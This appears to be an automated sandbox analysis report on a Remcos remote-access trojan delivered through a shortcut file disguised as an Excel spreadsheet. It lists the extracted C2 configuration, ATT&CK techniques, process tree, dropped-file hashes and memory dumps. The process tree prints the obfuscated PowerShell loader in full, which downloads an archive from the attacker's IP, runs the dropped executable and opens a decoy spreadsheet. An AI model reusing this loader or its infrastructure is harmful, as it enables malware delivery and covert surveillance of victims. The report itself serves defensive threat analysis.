remcos | 0973bf4ab963c2de6c69c3809ed228f0caf00409f4c09e78029640f2026dc19e

Analysis

max time kernel
148s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/08/2024, 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rv_luti_2024_roku.xlsx.lnk
Size

32KB
MD5

0ea3d54cecf6ea4d5e6739ffe9ce4be4
SHA1

513dca9cb690972319181c4f31ac98dcd80ea895
SHA256

ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03
SHA512

33826667e53d5cdb60ccfeb84a309059e20ce5da79d7dde853578fcea99b44d2a92debe4d6da65f463223b48d1b9f510bb0c9c3b26e7fb0b2a5199eb6ead45d2
SSDEEP

48:88muavUQSSesYOhI3YMEDo/i1xCoXEEDDo/L8A7NZdCZFXuGdZTa7x:88y8EesYeI3hX+xCRZR4uKQ

Score

10^/10

remcos feetfuck discovery rat

Malware Config

Extracted

Family

remcos

Botnet

feetfuck

83.222.191.201:24251

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-XTJ1YO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4968	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
1172	Newfts.exe
2304	Newfts.exe

Loads dropped DLL 8 IoCs

pid	Process
1172	Newfts.exe
1172	Newfts.exe
1172	Newfts.exe
1172	Newfts.exe
2304	Newfts.exe
2304	Newfts.exe
2304	Newfts.exe
2304	Newfts.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2304 set thread context of 5100	2304	Newfts.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4920	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe
1172	Newfts.exe
2304	Newfts.exe
2304	Newfts.exe
5100	cmd.exe
5100	cmd.exe
5100	cmd.exe
5100	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2304	Newfts.exe
5100	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4740 wrote to memory of 4968	4740	cmd.exe	85
PID 4740 wrote to memory of 4968	4740	cmd.exe	85
PID 4968 wrote to memory of 1172	4968	powershell.exe	95
PID 4968 wrote to memory of 1172	4968	powershell.exe	95
PID 4968 wrote to memory of 1172	4968	powershell.exe	95
PID 4968 wrote to memory of 4920	4968	powershell.exe	97
PID 4968 wrote to memory of 4920	4968	powershell.exe	97
PID 4968 wrote to memory of 4920	4968	powershell.exe	97
PID 1172 wrote to memory of 2304	1172	Newfts.exe	96
PID 1172 wrote to memory of 2304	1172	Newfts.exe	96
PID 1172 wrote to memory of 2304	1172	Newfts.exe	96
PID 2304 wrote to memory of 5100	2304	Newfts.exe	98
PID 2304 wrote to memory of 5100	2304	Newfts.exe	98
PID 2304 wrote to memory of 5100	2304	Newfts.exe	98
PID 4920 wrote to memory of 3476	4920	EXCEL.EXE	104
PID 4920 wrote to memory of 3476	4920	EXCEL.EXE	104
PID 2304 wrote to memory of 5100	2304	Newfts.exe	98
PID 5100 wrote to memory of 1540	5100	cmd.exe	110
PID 5100 wrote to memory of 1540	5100	cmd.exe	110
PID 5100 wrote to memory of 1540	5100	cmd.exe	110
PID 5100 wrote to memory of 1540	5100	cmd.exe	110
PID 5100 wrote to memory of 1540	5100	cmd.exe	110

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo TeuldrVGQbKMoxomeUoWOqhwvLOxvRa; echo kHymKfRwuZXnxCZJgAfmykUgOsaYlqvqidzuAVdr; echo BzhKUakeDaTwVhpLOdFPPdFVoZgkSjggfDEAGyfrfJLDRccpyaIWIA; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo kUBgvnjkEnVVtBTakWaQxmlPinKUrVTnqYKyBiuNzxKhEEivsinzTrJtp; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo KXIRBZFhgPOZEKacAcLhfiuehKFFEsRDolDsCVbHJSxXKtveGjGXJJi; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo QnvQaCnoZGPZHtQIYplmH; s''t''a''rt rv_luti_2024_roku.xlsx
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe
    "C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:5100
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1540
- - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      4⤵
      PID:3476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:4412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5d6247af

Filesize
1.2MB

MD5
c253ac4c2e9b1ea50c295a69934a6b71

SHA1
ba80b35a4e53c34726bc24c58e7d08b2ce01cfca

SHA256
53830e09dd6bd828ec6c700725946ffd836b5114f9702bb9be17bc4e056b075a

SHA512
eb061afebd138c51ff25a39203b66a6cb97ddc267366b71f795a9cf9ef645dbc905edc1772714c51148a5b56f15d860538f64c16b377154abc724ba8fc66be51

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j0ps2j2c.s0l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
374B

MD5
b10dee105cdbe3e2d4eed0bff1bd4fa9

SHA1
e21a70382f7de528f7ed7914c97ce8b80d1d1c0b

SHA256
1426fa59c30f740c0bb1d56f0e4da65ba2c4c24038d0d2f13055495a7c4f28fe

SHA512
5c3ec72c4bee05c2bb85334cea39c6606da7174bc9dc48539a2fe8464d057fc4c6a0a7883157e25d6b8554083da19d81bd7093c6e8a1fad3bd28674dc0ccc225

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
2KB

MD5
d0f14522333f489d4fed683f64f0f12e

SHA1
93036d0978729264139ed97baceabca95af7ed80

SHA256
ab2e42f9671e29fc719e4f835d8726a5d3890d1b06a93d093848c440fe562639

SHA512
36fc63f3c4f87c84fa2217dcd5f7fb9cbb79ceda6246df3b26682e439bfb0216e807c0e35342750cc108069b3b6c39fdefa92431b60b7f6d2d16e2ebf60268c6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
3KB

MD5
939fce2123fbc7c6e63a1c8ed6bb10a6

SHA1
5729e5c73f9e31af5597fddbf6dbb9b2c4cd4773

SHA256
2b852b6c3bf57a50406e70577008c1f25216f7eaecbcd0ac79f7f27191d8be07

SHA512
d912ed3e44817a38413c3bfc43de0dc8d34690da3c36b4b7c4bb2ccb6e96bb730837553628e1da30124cc73fafbdcb412bc47a1fd897a7614d2a4508e06e488b

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe

Filesize
2.1MB

MD5
db7e67835fce6cf9889f0f68ca9c29a9

SHA1
5565afda37006a66f0e4546105be60bbe7970616

SHA256
dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738

SHA512
bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\ProductStatistics3.dll

Filesize
1.1MB

MD5
59c15c71fd599ff745a862d0b8932919

SHA1
8384f88b4cac4694cf510ca0d3f867fd83cc9e18

SHA256
c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2

SHA512
be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\RegisterIdr.dll

Filesize
1.4MB

MD5
6fdb2e9ca6b7a5ad510e2b29831e3bc8

SHA1
4a14ee9d5660eb271a6b5f18a55ac3e05f952c68

SHA256
f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38

SHA512
d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\kytarvx

Filesize
31KB

MD5
5dc69a3e2fda6cb740f363ef77edcc13

SHA1
c177fabf17346531e07d562be11915bf2822148a

SHA256
7c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621

SHA512
b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\nywrof

Filesize
1.0MB

MD5
471076308d78944d45ab35d37134134a

SHA1
05cf2cf6e5d11ce10425b14d68cda3246cc47263

SHA256
38d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b

SHA512
7f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3

Download Submit
C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx

Filesize
32KB

MD5
21046015d5d9ef5e536ac7643b1ab365

SHA1
f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05

SHA256
7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd

SHA512
d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e

Download Submit
memory/1172-67-0x0000000002C40000-0x0000000002D5E000-memory.dmp

Filesize
1.1MB

Download
memory/1172-47-0x0000000002FA0000-0x0000000003112000-memory.dmp

Filesize
1.4MB

Download
memory/1172-43-0x0000000002C40000-0x0000000002D5E000-memory.dmp

Filesize
1.1MB

Download
memory/1172-50-0x0000000074540000-0x00000000746BB000-memory.dmp

Filesize
1.5MB

Download
memory/1172-66-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/1172-51-0x00007FFAED170000-0x00007FFAED365000-memory.dmp

Filesize
2.0MB

Download
memory/1172-68-0x0000000002FA0000-0x0000000003112000-memory.dmp

Filesize
1.4MB

Download
memory/1540-171-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-170-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-169-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-152-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-151-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-150-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-172-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-145-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-144-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-141-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/1540-140-0x00007FFAED170000-0x00007FFAED365000-memory.dmp

Filesize
2.0MB

Download
memory/1540-173-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/2304-88-0x00007FFAED170000-0x00007FFAED365000-memory.dmp

Filesize
2.0MB

Download
memory/2304-112-0x0000000074540000-0x00000000746BB000-memory.dmp

Filesize
1.5MB

Download
memory/2304-76-0x0000000002EF0000-0x0000000003062000-memory.dmp

Filesize
1.4MB

Download
memory/2304-72-0x0000000002B90000-0x0000000002CAE000-memory.dmp

Filesize
1.1MB

Download
memory/2304-84-0x0000000074540000-0x00000000746BB000-memory.dmp

Filesize
1.5MB

Download
memory/2304-109-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/2304-111-0x0000000002EF0000-0x0000000003062000-memory.dmp

Filesize
1.4MB

Download
memory/2304-110-0x0000000002B90000-0x0000000002CAE000-memory.dmp

Filesize
1.1MB

Download
memory/4920-80-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-87-0x00007FFAAAE10000-0x00007FFAAAE20000-memory.dmp

Filesize
64KB

Download
memory/4920-85-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-167-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-168-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-165-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-79-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-166-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-81-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-82-0x00007FFAAD1F0000-0x00007FFAAD200000-memory.dmp

Filesize
64KB

Download
memory/4920-86-0x00007FFAAAE10000-0x00007FFAAAE20000-memory.dmp

Filesize
64KB

Download
memory/4968-14-0x00007FFACF010000-0x00007FFACFAD1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-16-0x00007FFACF010000-0x00007FFACFAD1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-2-0x00007FFACF013000-0x00007FFACF015000-memory.dmp

Filesize
8KB

Download
memory/4968-8-0x000002B126950000-0x000002B126972000-memory.dmp

Filesize
136KB

Download
memory/4968-13-0x00007FFACF010000-0x00007FFACFAD1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-83-0x00007FFACF010000-0x00007FFACFAD1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-18-0x000002B13EC50000-0x000002B13EC5A000-memory.dmp

Filesize
40KB

Download
memory/4968-60-0x00007FFACF013000-0x00007FFACF015000-memory.dmp

Filesize
8KB

Download
memory/4968-17-0x000002B13F230000-0x000002B13F242000-memory.dmp

Filesize
72KB

Download
memory/5100-138-0x0000000074540000-0x00000000746BB000-memory.dmp

Filesize
1.5MB

Download
memory/5100-126-0x00007FFAED170000-0x00007FFAED365000-memory.dmp

Filesize
2.0MB

Download